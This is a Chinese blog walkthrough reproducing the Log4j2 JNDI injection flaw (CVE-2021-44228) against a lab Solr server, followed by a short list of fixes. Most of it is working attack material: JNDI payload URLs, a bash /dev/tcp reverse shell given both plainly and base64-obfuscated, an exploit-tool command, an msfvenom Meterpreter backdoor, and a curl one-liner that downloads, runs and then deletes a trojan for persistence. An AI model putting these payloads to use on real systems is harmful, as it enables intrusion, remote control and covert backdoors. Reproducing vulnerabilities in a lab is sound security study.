CVE-2021-44228 Log4j2漏洞复现

最新推荐文章于 2024-05-16 09:42:01 发布
最新推荐文章于 2024-05-16 09:42:01 发布
阅读量1.6k 收藏 34
点赞数 34
文章标签: log4j 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50892961/article/details/135446028
版权

前期了解:

apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。

JNDI:命名和目录接口,是java的一个目录服务应用程序接口,功能:提供一个目录系统,将服务名称和对象关联起来,使开发能使用名称来访问对象。

jndi可以远程加载ldap、rmi服务端提供的一些恶意代码

ldap:轻量级目录访问协议(类似于http,可以通过ldap://xxx.com访问)

log4j:

        fatal         严重/致命

        error         错误

        warn         警告

        info          信息

        debug      调试

        trace         程序允许轨迹[获得信息更详细]

        all         所有日志级别

        定制        自定义的级别

{jndi://ldap://服务IP/恶意代码}

一、启动环境docker-compose up -d:

 

二、浏览器访问 :  http://ip:8983

三、msf检测

msfconsole
msf6 > use auxiliary/scanner/http/log4shell_scanner

msf6 auxiliary(scanner/http/log4shell_scanner) > set rhosts 172.16.12.13

rhosts => 172.16.12.13

msf6 auxiliary(scanner/http/log4shell_scanner) > set rport 8983

rport => 8983

msf6 auxiliary(scanner/http/log4shell_scanner) > set srvhost 172.16.12.12

srvhost => 172.16.12.12

msf6 auxiliary(scanner/http/log4shell_scanner) > run

四、漏洞检测:

 

1、DNSlog 回显 h724nn.dnslog.cn

172.16.12.13:8983 拼接/solr/admin/cores?action= 再利用bp抓包 发送到重发器

利用dns回显查看java版本:

${jndi:ldap://${sys:java.version}.h724nn.dnslog.cn}

2、漏洞利用方法一:利用“中转”机器反弹shell

(1)kali攻击机12.12 ----开启监听

 

(2)“中转”机器12.11----开启ldap服务

(3)构造payload后去访问

http://172.16.12.13:8983/solr/admin/cores?action=${jndi:ldap://172.16.12.11:1389/Basic/ReverseShell/172.16.12.12/5555}

(4)“中转”机器服务得到回显,kali监听成功

3、漏洞利用方法二、利用bash反弹

kali启用ldap服务 在目标机执行反弹shell的命令

命令:bash -i > /dev/tcp/172.16.12.12/5555 2>&1 0>&1

精简版:bash -i >& /dev/tcp/172.16.12.12/5555 0>&1

(1)kali攻击机12开启监听【java版本需为1.8版本】

(2)对payload进行base64编码:

bash -i >& /dev/tcp/172.16.12.12/5555 0>&1 【编码后得到以下结果】

IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjEyLjEyLzU1NTUgMD4mMQ==

在靶机中实验一下效果【base64 -d 解码】

加上bash -i 执行命令后,kali监听成功

echo IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjEyLjEyLzU1NTUgMD4mMQ== | base64 -d | bash -i

利用bash -c 将命令整合到一块 空格用逗号代替,管道符之间的命令用{}括起来

"bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjEyLjEyLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}"

(3)攻击机kali12开启ldap服务

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 【与方法一不同,该工具自带恶意代码执行功能】

加载的恶意代码用 -C 表示 加上上面的命令

-A 在哪台机子上启的服务 172.16.12.12 【上面中转机器的工具 用的是-i 】

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjEyLjEyLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 172.16.12.12

(4)构造payload访问后,kali监听成功:

http://172.16.12.13:8983/solr/admin/cores?action=${jndi:ldap://172.16.12.12:1389/mkqatg}

kali监听成功:【payload可编码后再进行访问】

五、生成持久后门监听6666端口

1、利用msf生成后门

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.12.12 LPORT=6666 -f elf -o /var/www/html/jiali

2、使用监听模块监听

use exploit/multi/handler

3、使用获取到的权限远程下载木马并且执行

curl -so /tmp/jiali http://172.16.12.12/jiali;chmod +x /tmp/jiali;/tmp/jiali;rm -f /tmp/jiali

curl拓展:

-s  静默模式,不提示输出
-o  将下载的数据输出到目录
 

在拿到的权限下执行

监听成功:

六、修复建议

1、根除方案

(1)升级到2.15.0版本及以上 不要用2.15.0-rc1和2.15.0-rc2

(2)加装防护设备

(3)配置策略阻断log4j利用链

2、临时处置措施

(1)升级java版本

(2)修改log4j配置 jvm参数设置成true

(3)禁止log4j所在的服务器外连

wish-xiaohe
关注
  • 34
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教
2401_84102915的博客
04-05 675
L、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**既然是要面试,那么就少不了刷题,实际上春节回家后,哪儿也去不了,我自己是刷了不少面试题的,所以在面试过程中才能够做到心中有数,基本上会清楚面试过程中会问到哪些知识点,高频题又有哪些,所以刷题是面试前期准备过程中非常重要的一点。
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
CVE-2021-44228log4j2漏洞复现
fainpo的博客
05-07 265
漏洞适用版本:2.0 <= Apache log4j2 <= 2.14.1。
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
weixin_45715461的博客
06-28 3863
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Springboot项目如何创建单元测试
weixin_41998947的博客
05-13 608
本文介绍了一些单元测试的方法,在日常开发中应该避免使用main方法测试的方式进行测试,因为main方法既无法模拟项目的环境,而且又受静态方法的影响只能调用静态方法。还有一些其它的测试工具,录入yapi、easymock等也可以进行测试使用。
防静电劳保鞋:工业安全中的隐形守护者
最新发布
YOUSUTO的博客
05-16 341
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 449
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
如何确保您的Token安全:防范常见威胁与最佳实践
fudaihb的博客
05-14 957
Token安全网络安全领域的一个重要方面,尤其是在现代应用程序中,token常常用于身份验证和会话管理。本文将探讨如何保护token不受常见威胁的侵害,并提供一些最佳实践来增强token的安全性。
云端安全新纪元:云WAF的崛起
gmqqcsdn的博客
05-13 541
综上所述,云WAF在多个领域具有广泛的应用前景。它能够为企业和个人提供有效的网络安全防护解决方案,降低网络安全风险。然而,在实际应用过程中,云WAF也面临着一些挑战和问题,如如何保证防护效果、如何应对不断变化的攻击手段等。因此,我们需要不断研究和探索新的技术手段和方法,提高云WAF的防护能力和适应性。同时,政府、企业和个人也应加强网络安全意识培养和技术培训,共同营造安全、健康的网络环境。
接口安全设计之防篡改和防重放
记录,交流,共同进步
05-13 764
之所以想跟大家分享怎么做好基础的接口安全,一方面是工作需要,之前这部分的工作是我在负责,所以正好有这部分的经验;二是我之前也接触过很多做后端的同学,对于这一块大部分涉及不深或不太了解,也不知道怎么样做才算相对安全。所以把我的想法写出来,供大家参考和讨论,共同学习和进步。当然了,我分享的也只是我的个人经验,自然有很多的不足之处,也并不是说我后续阐述的一些观点和实现就一定是安全的,大家要加入自己的判断,并且混入一些定制化的东西。
Microsoft Dataverse中的安全概念
全网:架构师研究会
05-15 743
Dataverse的一个关键特性是其丰富的安全模型,可以适应许多业务使用场景。只有当环境中存在Dataverse数据库时,此安全模型才会发挥作用。作为管理员,您可能不会自己构建整个安全模型,但通常会参与管理用户、确保他们拥有正确的配置以及解决与安全访问相关的问题的过程。提示视频符号查看以下视频:Microsoft Dataverse – Security Concepts Shown In Dem...
富格林:梳理可信经验保障安全
fgl100的博客
05-13 223
通过多渠道的收集和分析找到市场的波动趋势,在根据趋势的变化进行交易。如果投资者对趋势变化没有把握的话,可以多留意正规专业的交易平台讯息,一般情况下都会给大家分享市场最新的走势变化,阅读贵金属知识课堂的文章就能够知道很多基本面消息,也能学到各种技术分析方法。富格林悉知,现货黄金被视作一种稳健的投资工具,因其对抗通货膨胀和政治不确定性的能力而备受青睐。如果处于亏损状态的时候,应该保持冷静,理性分析市场波动情况,如果亏损情况严重,应该及时离场保住自己的最大利益,重新调整心态再进场。
cve-2021-44228漏洞复现
03-16
cve-2021-44228漏洞是Apache Log4j 2.x中的一个严重漏洞,可以导致远程代码执行。要复现漏洞,需要使用恶意构造的日志消息来触发漏洞。 具体步骤如下: 1. 下载并安装Apache Log4j 2.x版本。 2. 创建一个Java程序,使用Log4j 2.x的API来记录日志。 3. 构造一个恶意的日志消息,其中包含一个特殊的字符序列,例如${jndi:ldap://attacker.com/Exploit}。 4. 将恶意的日志消息记录到日志中。 5. 启动应用程序并查看日志文件,如果存在漏洞,则会触发远程代码执行。 需要注意的是,该漏洞已经被广泛利用,因此建议尽快升级到最新版本的Apache Log4j 2.x,或者禁用Log4j 2.x的JNDI功能来缓解风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值